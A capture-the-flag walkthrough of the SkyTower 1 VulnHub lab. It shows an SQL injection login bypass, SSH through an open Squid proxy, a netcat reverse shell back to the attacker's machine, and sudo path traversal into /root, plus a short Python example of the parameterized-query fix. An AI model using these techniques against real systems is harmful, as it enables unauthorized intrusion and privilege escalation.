Today, let's work on the Skytower 1 VulnHub machine.
Let's find the IP first.
root@kali:~# nmap -sn 192.168.18.0/24
Nmap scan report for 192.168.18.94
Host is up (0.0086s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
So, our target IP is 192.168.18.94. Let's do a simple port scan.
root@kali:~# nmap -O -sV 192.168.18.94
There is a web server running on port 80. Let's have a look.
A login page. Let's try SQL injection.
We can use Burp Suite for this. Download a list of payloads to test from here.
Now let's capture the request in Burp.
Then right-click and send it to Intruder.
Set the attack type to 'pitchfork' and make sure that the email and password fields are selected as payload positions.
Now go to Payloads and load the payload list we downloaded for both the first and second payload sets.
As the attack runs, we notice that the response length of some requests is 231 and of others 1838. The ones with 1838 are the ones we want: they are successful logins.
Here let's try '-' as both email and password.
And we're in!
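As an added example (not code from the original writeup or from the SkyTower application), here is why '-' in both fields gets past a login that splices the form values into its SQL, beside the parameterized form that stops it. The table, column names and credentials are constructed placeholders, and the backend is assumed to be MySQL-style.

```python
import sqlite3


# Constructed sample table standing in for the application's login table;
# the names and credentials are placeholders, not SkyTower's.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (email TEXT, password TEXT)")
    db.execute("INSERT INTO login VALUES ('user@example.com', 'examplepass')")
    return db


def build_unsafe_query(email, password):
    """The vulnerable pattern: form fields spliced straight into the SQL text.

    With '-' in both fields the quotes close the string literals early and
    the clause becomes  email=''-'' AND password=''-'' .  On a MySQL-style
    backend (assumed here) ''-'' is the number 0, and a non-numeric TEXT
    value compared with 0 is coerced to 0 as well, so the WHERE clause is
    true for every row and the first user is logged in.  SQLite compares
    such values as text and does not reproduce that, so this function only
    shows the SQL the server would receive rather than executing it.
    """
    return ("SELECT email FROM login WHERE email='%s' AND password='%s'"
            % (email, password))


def safe_login(db, email, password):
    """The hardened form: bound parameters keep the quote in '-' as data."""
    row = db.execute(
        "SELECT email FROM login WHERE email=? AND password=?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(build_unsafe_query("'-'", "'-'"))
    db = make_db()
    print(safe_login(db, "'-'", "'-'"))                       # None: bypass fails
    print(safe_login(db, "user@example.com", "examplepass"))  # user@example.com
```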
We have the SSH login credentials now. Let's try logging in.
It's not connecting. But remember, we have a Squid proxy open on port 3128.
Let's try connecting through it.
Add the following line to the proxychains configuration:
http 192.168.18.94 3128
Now, let's try connecting to the machine.
We logged in to the server and were logged out automatically. Let's try running a command upon login.
root@kali:~# proxychains ssh -t email@example.com ls -la
OK, so our command is working, but we are still getting logged out. Let's try to get a reverse shell through this.
First, check whether netcat is present there.
Yes. Now let's spawn a reverse shell.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
We executed the command and got a reverse shell on our Kali machine.
We are in. Now let's have a look at /etc/passwd.
There are two more users, sara and william.
Let's try to find the passwords of sara and william too and log in.
username: firstname.lastname@example.org password: '-'
username: email@example.com password: '-'
We got sara's password. Let's try logging in.
root@kali:~# proxychains ssh -t firstname.lastname@example.org nc 192.168.18.92 4444 -e /bin/bash
We got access to sara's account.
Run sudo -l to view sara's sudo permissions.
So, sara can use the /accounts/ directory with root permissions.
According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login
we can execute a script upon SSH login if we place it in
Let's have a look.
Let's try removing this and logging in again.
Now we can run sudo ls /accounts/ on the machine with root permissions.
What about sudo ls /accounts/../ ? Let's try.
Using this method, we can go back to the /root directory and find a flag.txt file there.
Use cat to read the file:
sudo cat /accounts/../root/flag.txt
We got the root password now. Let's try to become root using the su command.
We are root!